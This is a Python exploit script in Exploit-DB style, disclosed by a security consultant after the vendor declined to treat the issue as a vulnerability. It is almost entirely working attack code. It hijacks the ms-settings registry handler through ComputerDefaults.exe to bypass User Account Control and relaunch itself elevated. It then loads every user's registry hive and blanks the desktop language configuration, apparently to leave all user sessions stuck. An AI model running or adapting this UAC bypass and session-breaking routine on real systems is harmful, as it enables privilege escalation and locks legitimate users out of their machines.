#!/usr/bin/env python # # Exploit Title: Windows 10 All Users Session Stuck # Date: 2018-10-24 # Exploit Author: Fabien DROMAS - Security consultant @ Synetis # Twitter: st0rnpentest # # After microsoft's refusal to consider the issue as a security problem, I disclose the script # Vendor Homepage: www.microsoft.com # Version: Version 10.0.17134.345 # Tested on: Windows 10 pro Version 10.0.17134.345 # from os import listdir, system, path from ctypes import * import _winreg def create_reg_key(key, value): try: _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command') registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Software\Classes\ms-settings\shell\open\command', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise def exec_bypass_uac(cmd): try: create_reg_key('DelegateExecute', '') create_reg_key(None, cmd) except WindowsError: raise def bypass_uac(): try: current=path.dirname(path.realpath(__file__)) + '\\' + __file__ cmd="C:\windows\System32\cmd.exe /k c:\python27\python %s" %current exec_bypass_uac(cmd) system(r'C:\windows\system32\ComputerDefaults.exe') return 1 except WindowsError: sys.exit(1) def modify_reg_key(key, value): try: registry_key=_winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise def modify_reg_key_Others(key, value): try: registry_key = _winreg.OpenKey(_winreg.HKEY_USERS, 'w00t\Control Panel\Desktop\LanguageConfiguration', 0, _winreg.KEY_WRITE) _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) _winreg.CloseKey(registry_key) except WindowsError: raise if __name__ == '__main__': try: sys32="c:\\windows\\system32\\" users="c:\\users\\" exclude=["Public", "desktop.ini", "All Users"] # Modify all users if windll.Shell32.IsUserAnAdmin(): for i in listdir(users): if i not in exclude: system("reg.exe LOAD HKU\w00t "+users+i+"\NTUSER.DAT") modify_reg_key_Others('', '') system("reg.exe UNLOAD HKU\w00t") # Modify current user modify_reg_key('', '') else: bypass_uac() except WindowsError: raise